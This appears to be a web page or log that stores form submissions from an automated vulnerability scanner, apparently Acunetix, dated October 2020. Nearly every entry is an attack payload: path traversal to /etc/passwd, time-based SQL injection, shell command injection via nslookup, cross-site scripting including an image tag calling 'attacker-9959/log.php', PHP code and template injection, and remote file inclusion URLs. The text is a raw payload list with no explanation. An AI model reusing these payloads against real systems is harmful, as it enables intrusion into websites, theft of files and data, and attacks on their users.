1

e [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 21:57:10

1

e [)] 2020-10-28 21:57:10

1

e [1some_inexistent_file_with_long_name.82] 2020-10-28 21:57:09

1

e [N7FtahYT'; waitfor delay '0:0:9' -- ] 2020-10-28 21:57:09

1

e [116.113.93.82&n983497=v954755] 2020-10-28 21:57:09

1

e [116.113.93.82] 2020-10-28 21:57:09

${9999928+9999314}

e [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 21:57:09

1

e [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 21:57:08

1

e [1 waitfor delay '0:0:6' -- ] 2020-10-28 21:57:08

1

e [116.113.93.82] 2020-10-28 21:57:08

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 21:57:07

1

e [(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/] 2020-10-28 21:57:07

1

e [116.113.93.82] 2020-10-28 21:57:06

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

e [../../../../../../../../../../etc/passwd.82] 2020-10-28 21:57:06

1

e [${9999319+9999286}] 2020-10-28 21:57:06

1

e [Array] 2020-10-28 21:57:06

1

e [0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z] 2020-10-28 21:57:05

1

e [Array] 2020-10-28 21:57:05

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 21:57:05

1

e [0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z] 2020-10-28 21:57:04

1

e [12345'"\'\");|]*{ <>] 2020-10-28 21:57:04

1

e [116.113.93.82] 2020-10-28 21:57:04

&nslookup XfS41hF0&'\"`0&nslookup XfS41hF0&`'

e [../../../../../../../../../../../../../../../proc/version] 2020-10-28 21:57:04

1

e [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 21:57:04

1

e [116.113.93.82] 2020-10-28 21:57:04

"+response.write(9831101*9023543)+"

e [if(now()=sysdate(),sleep(3),0)] 2020-10-28 21:57:04

1

e [] 2020-10-28 21:57:03

1

e [../../../../../../../../../../etc/passwd] 2020-10-28 21:57:03

1

e [116.113.93.82] 2020-10-28 21:57:03

$(nslookup p5FIg3S8)

e [116.113.93.82] 2020-10-28 21:57:03

'+response.write(9831101*9023543)+'

e [-1" OR 2+110-110-1=0+0+0+1 -- ] 2020-10-28 21:57:03

1

e [116.113.93.82] 2020-10-28 21:57:03

set|set&set

e [116.113.93.82] 2020-10-28 21:57:02

response.write(9831101*9023543)

e [-1' OR 2+38-38-1=0+0+0+1 or 'O9zR2pD0'='] 2020-10-28 21:57:02

1

e [116.113.93.82] 2020-10-28 21:57:02

qhf4imdL

e [-1' OR 2+904-904-1=0+0+0+1 -- ] 2020-10-28 21:57:00

1

e [lV1r8Ppc] 2020-10-28 21:57:00

1

e [-1 OR 2+285-285-1=0+0+0+1] 2020-10-28 21:56:59

1

e [-1 OR 2+348-348-1=0+0+0+1 -- ] 2020-10-28 21:56:58

1

e [&nslookup uwJrspL9&'\"`0&nslookup uwJrspL9&`'] 2020-10-28 21:56:58

1

e [CcEBVaUL] 2020-10-28 21:56:57

1

e ["+response.write(9924545*9285368)+"] 2020-10-28 21:56:57

1

e [$(nslookup IMukTSXd)] 2020-10-28 21:56:57

1

e [116.113.93.82] 2020-10-28 21:56:56

1

e ['+response.write(9924545*9285368)+'] 2020-10-28 21:56:56

1

e [set|set&set] 2020-10-28 21:56:55

1

e [116.113.93.82] 2020-10-28 21:56:55

1

e [response.write(9924545*9285368)] 2020-10-28 21:56:55

1

e [116.113.93.82] 2020-10-28 21:55:55

1

e [116.113.93.82] 2020-10-28 21:49:39

1

e [116.113.93.82] 2020-10-28 21:49:36

1

e [116.113.93.82] 2020-10-28 21:49:33

1

e [116.113.93.82] 2020-10-28 21:49:30

1<pvThQ1<

e [116.113.93.82] 2020-10-28 21:49:27

1<img sRc='http://attacker-9959/log.php?

e [116.113.93.82] 2020-10-28 21:49:24

1<6W54OH x=9667>

e [116.113.93.82] 2020-10-28 21:49:21

1<ifRAme sRc=9346.com></IfRamE>

e [116.113.93.82] 2020-10-28 21:49:18

1<WYZF9X>7WAXI[!+!]</WYZF9X>

e [116.113.93.82] 2020-10-28 21:49:15

1vabfp <ScRiPt >YSAe(9220)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:49:13

1<% contenteditable onresize=YSAe(9614)>

e [116.113.93.82] 2020-10-28 21:49:10

1}body{acu:Expre/**/SSion(YSAe(9600))}

e [116.113.93.82] 2020-10-28 21:49:07

1<img<!-- --> src=x onerror=alert(9029);//><!-- -->

e [116.113.93.82] 2020-10-28 21:49:04

[url=http://www.vulnweb.com][/url]

e [116.113.93.82] 2020-10-28 21:49:02

<a HrEF=jaVaScRiPT:>

e [116.113.93.82] 2020-10-28 21:48:59

<a HrEF=http://www.vulnweb.com></a>

e [116.113.93.82] 2020-10-28 21:48:57

1<input autofocus onfocus=YSAe(9139)>

e [116.113.93.82] 2020-10-28 21:48:54

e [116.113.93.82] 2020-10-28 21:48:52

1<ScRiPt>YSAe(9134)</sCripT>

e [116.113.93.82] 2020-10-28 21:48:49

1\u003CScRiPt\YSAe(9420)\u003C/sCripT\u003E

e [116.113.93.82] 2020-10-28 21:48:46

%31%3C%53%63%52%69%50%74%20%3E%59%53%41%65%289443%29%3C%2F%73%43%72%69%70%54%3E

e [116.113.93.82] 2020-10-28 21:48:44

1<img/src=">" onerror=alert(9345)>

e [116.113.93.82] 2020-10-28 21:48:42

1<img src=xyz OnErRor=YSAe(9784)>

e [116.113.93.82] 2020-10-28 21:48:39

1<img src=//testasp.vulnweb.com/t/dot.gif onload=YSAe(9337)>

e [116.113.93.82] 2020-10-28 21:48:36

1<body onload=YSAe(9536)>

e [116.113.93.82] 2020-10-28 21:48:33

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9676'>

e [116.113.93.82] 2020-10-28 21:48:31

1<isindex type=image src=1 onerror=YSAe(9666)>

e [116.113.93.82] 2020-10-28 21:48:28

1<svg

e [116.113.93.82] 2020-10-28 21:48:24

1<video><source onerror="javascript:YSAe(9517)">

e [116.113.93.82] 2020-10-28 21:48:23

1<ScRiPt >YSAe(9767)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:48:19

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9448></ScRiPt>

e [116.113.93.82] 2020-10-28 21:48:17

1<ScRiPt >YSAe(9910)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:48:14

1<ScR<ScRiPt>IpT>YSAe(9632)</sCr<ScRiPt>IpT>

e [116.113.93.82] 2020-10-28 21:48:12

1<script>YSAe(9695)</script>

e [116.113.93.82] 2020-10-28 21:48:09

1<WCOZWE>C3W4X[!+!]</WCOZWE>

e [116.113.93.82] 2020-10-28 21:48:06

1<ScRiPt >YSAe(9589)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:48:04

{{9999827*9999121}}

e [116.113.93.82] 2020-10-28 21:48:01

acux3322

e [116.113.93.82] 2020-10-28 21:47:58

acu6796<s1﹥s2ʺs3ʹuca6796

e [116.113.93.82] 2020-10-28 21:47:54

19799933

e [116.113.93.82] 2020-10-28 21:47:53

'"()&%<acx><ScRiPt >YSAe(9619)</ScRiPt>

e [116.113.93.82] 2020-10-28 21:47:50

1'"()&%<acx><ScRiPt >YSAe(9882)</ScRiPt>

e [116.113.93.82<Qe2jsk<] 2020-10-28 21:47:43

1

e [116.113.93.82<img sRc='http://attacker-9902/log.php?] 2020-10-28 21:47:40

1

e [116.113.93.82<DIsby0 x=9534>] 2020-10-28 21:47:37

1

e [116.113.93.82<ifRAme sRc=9471.com></IfRamE>] 2020-10-28 21:47:34

1

e [116.113.93.82<WJJILE>FCLCA[!+!]</WJJILE>] 2020-10-28 21:47:32

1

e [116.113.93.82C9xpG <ScRiPt >YSAe(9962)</ScRiPt>] 2020-10-28 21:47:29

1

e [116.113.93.82] 2020-10-28 21:47:27

1

e [116.113.93.82<% contenteditable onresize=YSAe(9173)>] 2020-10-28 21:47:26

1

e [116.113.93.82] 2020-10-28 21:47:24

1

e [116.113.93.82] 2020-10-28 21:47:23

1

e [116.113.93.82}body{acu:Expre/**/SSion(YSAe(9088))}] 2020-10-28 21:47:23

1

e [116.113.93.82] 2020-10-28 21:47:23

1

e [116.113.93.82] 2020-10-28 21:47:22

1

e [116.113.93.82<img<!-- --> src=x onerror=alert(9346);//><!-- -->] 2020-10-28 21:47:20

1

e [116.113.93.82] 2020-10-28 21:47:19

1

e [116.113.93.82] 2020-10-28 21:47:18

1

e [116.113.93.82] 2020-10-28 21:47:18

1

e [[url=http://www.vulnweb.com][/url]] 2020-10-28 21:47:17

1

e [116.113.93.82] 2020-10-28 21:47:17

1

e [116.113.93.82] 2020-10-28 21:47:17

1

e [116.113.93.82] 2020-10-28 21:47:16

1

e [116.113.93.82] 2020-10-28 21:47:16

1

e [<a HrEF=jaVaScRiPT:>] 2020-10-28 21:47:14

1

e [116.113.93.82] 2020-10-28 21:47:14

1

e [116.113.93.82] 2020-10-28 21:47:14

1

e [116.113.93.82] 2020-10-28 21:47:13

1

e [116.113.93.82] 2020-10-28 21:47:13

1

e [116.113.93.82] 2020-10-28 21:47:13

1

e [116.113.93.82] 2020-10-28 21:47:13

1

e [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 21:47:12

1

e [116.113.93.82] 2020-10-28 21:47:12

1

e [116.113.93.82] 2020-10-28 21:47:12

1

e [116.113.93.82] 2020-10-28 21:47:11

1

e [116.113.93.82] 2020-10-28 21:47:11

1

e [116.113.93.82] 2020-10-28 21:47:10

1

e [116.113.93.82] 2020-10-28 21:47:09

1

e [116.113.93.82<input autofocus onfocus=YSAe(9657)>] 2020-10-28 21:47:09

1

e [116.113.93.82] 2020-10-28 21:47:09

1

e [116.113.93.82] 2020-10-28 21:47:08

1

e [116.113.93.82] 2020-10-28 21:47:08

1

e [116.113.93.82] 2020-10-28 21:47:07

1

e [] 2020-10-28 21:47:07

1

e [116.113.93.82] 2020-10-28 21:47:07

1

e [116.113.93.82] 2020-10-28 21:47:06

1

e [116.113.93.82] 2020-10-28 21:47:05

1

e [116.113.93.82] 2020-10-28 21:47:05

1

e [116.113.93.82] 2020-10-28 21:47:04

1

e [116.113.93.82<ScRiPt>YSAe(9194)</sCripT>] 2020-10-28 21:47:04

1

e [116.113.93.82] 2020-10-28 21:47:04

1

e [116.113.93.82] 2020-10-28 21:47:03

1

e [116.113.93.82] 2020-10-28 21:47:03

1

e [116.113.93.82\u003CScRiPt\YSAe(9670)\u003C/sCripT\u003E] 2020-10-28 21:47:02

1

e [116.113.93.82] 2020-10-28 21:47:02

1

e [116.113.93.82] 2020-10-28 21:47:01

1

e [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%59%53%41%65%289862%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 21:46:59

1

e [116.113.93.82<img/src=">" onerror=alert(9567)>] 2020-10-28 21:46:57

1

e [116.113.93.82<img src=xyz OnErRor=YSAe(9676)>] 2020-10-28 21:46:54

1

e [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=YSAe(9488)>] 2020-10-28 21:46:51

1

e [116.113.93.82<body onload=YSAe(9761)>] 2020-10-28 21:46:49

1

e [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9804'>] 2020-10-28 21:46:44

1

e [116.113.93.82<isindex type=image src=1 onerror=YSAe(9018)>] 2020-10-28 21:46:43

1

e [116.113.93.82<svg ] 2020-10-28 21:46:40

1

e [116.113.93.82<video><source onerror="javascript:YSAe(9110)">] 2020-10-28 21:46:38

1

e [116.113.93.82] 2020-10-28 21:46:36

WEB-INF\web.xml

e [116.113.93.82] 2020-10-28 21:46:35

WEB-INF/web.xml

e [116.113.93.82<ScRiPt >YSAe(9713)</ScRiPt>] 2020-10-28 21:46:35

1

e [116.113.93.82] 2020-10-28 21:46:35

1

e [116.113.93.82] 2020-10-28 21:46:34

1

e [116.113.93.82] 2020-10-28 21:46:34

/WEB-INF/web.xml

e [116.113.93.82] 2020-10-28 21:46:34

1

e [116.113.93.82] 2020-10-28 21:46:33

1

e [116.113.93.82] 2020-10-28 21:46:33

/\../\../\../\../\../\../\../etc/passwd

e [116.113.93.82] 2020-10-28 21:46:33

dHe9dbmT'));select pg_sleep(6); --

e [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9608></ScRiPt>] 2020-10-28 21:46:33

1

e [116.113.93.82] 2020-10-28 21:46:33

1

e [116.113.93.82] 2020-10-28 21:46:33

file:///etc/passwd

e [116.113.93.82] 2020-10-28 21:46:32

WCIVbsVb');select pg_sleep(3); --

e [116.113.93.82] 2020-10-28 21:46:32

1

e [116.113.93.82] 2020-10-28 21:46:32

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

e [116.113.93.82] 2020-10-28 21:46:31

nyWleOAR';select pg_sleep(3); --

e [116.113.93.82] 2020-10-28 21:46:31

..

e [116.113.93.82<ScRiPt >YSAe(9571)</ScRiPt>] 2020-10-28 21:46:30

1

e [116.113.93.82] 2020-10-28 21:46:30

-1));select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 21:46:30

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

e [116.113.93.82] 2020-10-28 21:46:29

1

e [116.113.93.82] 2020-10-28 21:46:29

-1);select pg_sleep(6); --

e [116.113.93.82] 2020-10-28 21:46:29

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

e [116.113.93.82] 2020-10-28 21:46:28

-1;select pg_sleep(3); --

e [116.113.93.82] 2020-10-28 21:46:28

/.././.././.././.././.././.././.././../etc/./passwd%00

e [116.113.93.82<ScR<ScRiPt>IpT>YSAe(9728)</sCr<ScRiPt>IpT>] 2020-10-28 21:46:27

1

e [116.113.93.82] 2020-10-28 21:46:27

NlW2lAWo'; waitfor delay '0:0:9' --

e [116.113.93.82] 2020-10-28 21:46:26

%2fetc%2fpasswd

e [116.113.93.82] 2020-10-28 21:46:25

1 waitfor delay '0:0:6' --

e [116.113.93.82] 2020-10-28 21:46:25

/etc/passwd

e [116.113.93.82<script>YSAe(9751)</script>] 2020-10-28 21:46:25

1

e [116.113.93.82] 2020-10-28 21:46:24

-1); waitfor delay '0:0:3' --

e [116.113.93.82] 2020-10-28 21:46:24

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

e [116.113.93.82] 2020-10-28 21:46:24

-1; waitfor delay '0:0:9' --

e [116.113.93.82] 2020-10-28 21:46:23

/../..//../..//../..//../..//../..//etc/passwd.jpg

e [116.113.93.82] 2020-10-28 21:46:23

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

e [116.113.93.82] 2020-10-28 21:46:23

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

e [116.113.93.82<WPECDQ>ZTV4J[!+!]</WPECDQ>] 2020-10-28 21:46:23

1

e [116.113.93.82] 2020-10-28 21:46:22

0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z

e [116.113.93.82] 2020-10-28 21:46:22

../../../../../../../../../../etc/passwd.jpg

e [116.113.93.82] 2020-10-28 21:46:21

0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z

e [116.113.93.82] 2020-10-28 21:46:21

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

e [116.113.93.82] 2020-10-28 21:46:20

e [116.113.93.82<ScRiPt >YSAe(9530)</ScRiPt>] 2020-10-28 21:46:20

1

e [116.113.93.82] 2020-10-28 21:46:20

if(now()=sysdate(),sleep(3),0)

e [116.113.93.82] 2020-10-28 21:46:19

../../../../../../../../../../../../../../../proc/version

e [116.113.93.82] 2020-10-28 21:46:19

e [116.113.93.82] 2020-10-28 21:46:19

-1" OR 2+380-380-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 21:46:18

../../../../../../../../../../etc/passwd

e [{{9999333*10000016}}] 2020-10-28 21:46:17

1

e [116.113.93.82] 2020-10-28 21:46:17

-1' OR 2+610-610-1=0+0+0+1 or 'YOQFetD0'='

e [116.113.93.82] 2020-10-28 21:46:17

JyI=

e [116.113.93.82] 2020-10-28 21:46:16

@@zp8rL

e [116.113.93.82] 2020-10-28 21:46:16

-1' OR 2+945-945-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 21:46:15

1

e [116.113.93.82] 2020-10-28 21:46:15

-1 OR 2+809-809-1=0+0+0+1

e [acux10298] 2020-10-28 21:46:14

1

e [116.113.93.82] 2020-10-28 21:46:14

\

e [116.113.93.82] 2020-10-28 21:46:14

-1 OR 2+869-869-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 21:46:13

1'"

e [116.113.93.82] 2020-10-28 21:46:13

awUISnc0

e [116.113.93.82] 2020-10-28 21:46:13

1

e [116.113.93.82] 2020-10-28 21:46:12

1

e [116.113.93.82] 2020-10-28 21:46:12

1

e [116.113.93.82] 2020-10-28 21:46:12

1

e [acu5942<s1﹥s2ʺs3ʹuca5942] 2020-10-28 21:46:12

1

e [116.113.93.82] 2020-10-28 21:46:11

1

e [116.113.93.82] 2020-10-28 21:46:11

1

e [116.113.93.82] 2020-10-28 21:46:10

1

e [116.113.93.829384661] 2020-10-28 21:46:09

1

e [116.113.93.82] 2020-10-28 21:46:09

1

e [116.113.93.82] 2020-10-28 21:46:09

1

e [116.113.93.82] 2020-10-28 21:46:09

<!--

e [116.113.93.82] 2020-10-28 21:46:08

1

e [116.113.93.82] 2020-10-28 21:46:08

'"

e [116.113.93.82] 2020-10-28 21:46:07

1

e ['"()&%<acx><ScRiPt >YSAe(9449)</ScRiPt>] 2020-10-28 21:46:06

1

e [116.113.93.82] 2020-10-28 21:46:06

1

e [116.113.93.82] 2020-10-28 21:46:05

1

e [116.113.93.82] 2020-10-28 21:46:04

1

e [] 2020-10-28 21:46:04

1

e [<!--] 2020-10-28 21:46:04

1

e [116.113.93.82] 2020-10-28 21:46:04

1

e [116.113.93.82] 2020-10-28 21:46:03

1

e [116.113.93.82'"()&%<acx><ScRiPt >YSAe(9310)</ScRiPt>] 2020-10-28 21:46:03

1

e [] 2020-10-28 21:46:03

1

e ['"] 2020-10-28 21:46:03

1

e [116.113.93.82] 2020-10-28 21:46:03

/www.vulnweb.com

e [116.113.93.82] 2020-10-28 21:46:03

1

e [116.113.93.82] 2020-10-28 21:46:03

1

e [116.113.93.82] 2020-10-28 21:46:03

1

e [JyI=] 2020-10-28 21:46:03

1

e [116.113.93.82] 2020-10-28 21:46:02

1

e [@@Pq9XR] 2020-10-28 21:46:02

1

e [116.113.93.82] 2020-10-28 21:46:02

${@print(md5(acunetix_wvs_security_test))}\

e [116.113.93.82] 2020-10-28 21:46:01

1

e [/www.vulnweb.com] 2020-10-28 21:46:01

1

e [116.113.93.82] 2020-10-28 21:46:01

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

e [1] 2020-10-28 21:46:00

1

e [116.113.93.82] 2020-10-28 21:46:00

${@print(md5(acunetix_wvs_security_test))}

e [116.113.93.82] 2020-10-28 21:46:00

1

e [116.113.93.82] 2020-10-28 21:46:00

1

e [116.113.93.82] 2020-10-28 21:45:59

http://hitowVcpVX6tX.bxss.me/

e [\] 2020-10-28 21:45:59

1

e [116.113.93.82] 2020-10-28 21:45:59

";print(md5(acunetix_wvs_security_test));$a="

e [116.113.93.82] 2020-10-28 21:45:59

1

e [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 21:45:59

1

e [116.113.93.82] 2020-10-28 21:45:59

create/.

e [1'"] 2020-10-28 21:45:58

1

e [116.113.93.82] 2020-10-28 21:45:58

';print(md5(acunetix_wvs_security_test));$a='

e [116.113.93.82] 2020-10-28 21:45:57

testasp.vulnweb.com

e [116.113.93.82] 2020-10-28 21:45:57

create

e [116.113.93.82] 2020-10-28 21:45:57

1

e [116.113.93.82] 2020-10-28 21:45:56

;print(md5(acunetix_wvs_security_test));

e [WEB-INF\web.xml] 2020-10-28 21:45:56

1

e [116.113.93.82] 2020-10-28 21:45:56

1

e [116.113.93.82] 2020-10-28 21:45:56

http://testasp.vulnweb.com/t/fit.txt?.jpg

e [116.113.93.82] 2020-10-28 21:45:56

1

e [116.113.93.82] 2020-10-28 21:45:56

create

e [116.113.93.82] 2020-10-28 21:45:56

1

e [http://hitZPpjQz5ka2.bxss.me/] 2020-10-28 21:45:56

1

e [116.113.93.82] 2020-10-28 21:45:55

1

e [WEB-INF/web.xml] 2020-10-28 21:45:55

1

e [116.113.93.82] 2020-10-28 21:45:55

Http://testasp.vulnweb.com/t/fit.txt

e [116.113.93.82] 2020-10-28 21:45:55

^(#$!@#$)(()))******

e [/WEB-INF/web.xml] 2020-10-28 21:45:54

1

e [116.113.93.82] 2020-10-28 21:45:54

1some_inexistent_file_with_long_name.jpg

e [116.113.93.82] 2020-10-28 21:45:54

!(()&&!|*|*|

e [116.113.93.82] 2020-10-28 21:45:53

1

e [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 21:45:53

1

e [116.113.93.82] 2020-10-28 21:45:53

testasp.vulnweb.com/t/xss.html?%00

e [116.113.93.82] 2020-10-28 21:45:53

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

e [116.113.93.82] 2020-10-28 21:45:53

)

e [file:///etc/passwd] 2020-10-28 21:45:52

1

e [116.113.93.82] 2020-10-28 21:45:52

HttP://testasp.vulnweb.com/t/xss.html?%00

e [116.113.93.82] 2020-10-28 21:45:52

'"()

e [create/.] 2020-10-28 21:45:52

1

e [116.113.93.82] 2020-10-28 21:45:52

1

e [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 21:45:52

1

e [116.113.93.82] 2020-10-28 21:45:51

Array

e [116.113.93.82] 2020-10-28 21:45:51

1

e [create] 2020-10-28 21:45:51

1

e [116.113.93.82] 2020-10-28 21:45:51

Array

e [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 21:45:51

1

e [116.113.93.82] 2020-10-28 21:45:51

1

e [..] 2020-10-28 21:45:51

1

e [116.113.93.82] 2020-10-28 21:45:50

Array

e [create] 2020-10-28 21:45:50

1

e [QPEbZiG1'));select pg_sleep(3); -- ] 2020-10-28 21:45:50

1

e [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 21:45:50

1

e [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 21:45:49

1

e [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 21:45:49

1

e [116.113.93.82] 2020-10-28 21:45:49

12345'"\'\");|]*{ <>

e [116.113.93.82] 2020-10-28 21:45:49

1

e [^(#$!@#$)(()))******] 2020-10-28 21:45:48

1

e [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 21:45:48

1

e [G7BfG7Wm');select pg_sleep(9); -- ] 2020-10-28 21:45:48

1

e [116.113.93.82] 2020-10-28 21:45:48

1&n942159=v905970

e [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 21:45:48

1

e [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 21:45:48

1

e [116.113.93.82] 2020-10-28 21:45:48

e [116.113.93.82] 2020-10-28 21:45:47

1

e [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 21:45:47

1

e ['"()] 2020-10-28 21:45:47

1

e [116.113.93.82] 2020-10-28 21:45:47

1

e [!(()&&!|*|*|] 2020-10-28 21:45:47

1

e [kdO2Q5ru';select pg_sleep(6); -- ] 2020-10-28 21:45:47

1

e [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 21:45:47

1

e [116.113.93.82] 2020-10-28 21:45:46

1

e [;print(md5(acunetix_wvs_security_test));] 2020-10-28 21:45:46

1

e [Array] 2020-10-28 21:45:46

1

e [testasp.vulnweb.com] 2020-10-28 21:45:46

1

e [sskHx5TL'; waitfor delay '0:0:6' -- ] 2020-10-28 21:45:46

1

e [%2fetc%2fpasswd] 2020-10-28 21:45:46

1

e [116.113.93.82] 2020-10-28 21:45:46

1

e [)] 2020-10-28 21:45:46

1

e [116.113.93.82&n945407=v945443] 2020-10-28 21:45:45

1

e [116.113.93.82] 2020-10-28 21:45:45

1

e [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 21:45:45

1

e [1 waitfor delay '0:0:3' -- ] 2020-10-28 21:45:45

1

e [116.113.93.82] 2020-10-28 21:45:44

1

e [/etc/passwd] 2020-10-28 21:45:44

1

e [116.113.93.82] 2020-10-28 21:45:44

1

e [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 21:45:44

1

e [(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/] 2020-10-28 21:45:44

1

e [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 21:45:43

1

e [116.113.93.82] 2020-10-28 21:45:43

1

e [1some_inexistent_file_with_long_name.82] 2020-10-28 21:45:43

1

e [116.113.93.82] 2020-10-28 21:45:43

${10000261+10000155}

e [0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z] 2020-10-28 21:45:43

1

e [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 21:45:43

1

e [Array] 2020-10-28 21:45:43

1

e [116.113.93.82] 2020-10-28 21:45:42

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

e [116.113.93.82] 2020-10-28 21:45:42

&nslookup d0v4F84h&'\"`0&nslookup d0v4F84h&`'

e [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 21:45:42

1

e [0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z] 2020-10-28 21:45:42

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 21:45:42

1

e [Array] 2020-10-28 21:45:42

1

e [116.113.93.82] 2020-10-28 21:45:41

$(nslookup 66mwYFDZ)

e [116.113.93.82] 2020-10-28 21:45:41

"+response.write(9881713*9742888)+"

e [../../../../../../../../../../etc/passwd.82] 2020-10-28 21:45:41

1

e [${9999112+9999722}] 2020-10-28 21:45:41

1

e [if(now()=sysdate(),sleep(9),0)] 2020-10-28 21:45:41

1

e [12345'"\'\");|]*{ <>] 2020-10-28 21:45:40

1

e [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 21:45:40

1

e [116.113.93.82] 2020-10-28 21:45:40

set|set&set

e [-1" OR 2+542-542-1=0+0+0+1 -- ] 2020-10-28 21:45:39

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 21:45:39

1

e [] 2020-10-28 21:45:39

1

e [116.113.93.82] 2020-10-28 21:45:39

'+response.write(9881713*9742888)+'

e [116.113.93.82] 2020-10-28 21:45:39

1

e [-1' OR 2+974-974-1=0+0+0+1 or 'pNTmpCzN'='] 2020-10-28 21:45:38

1

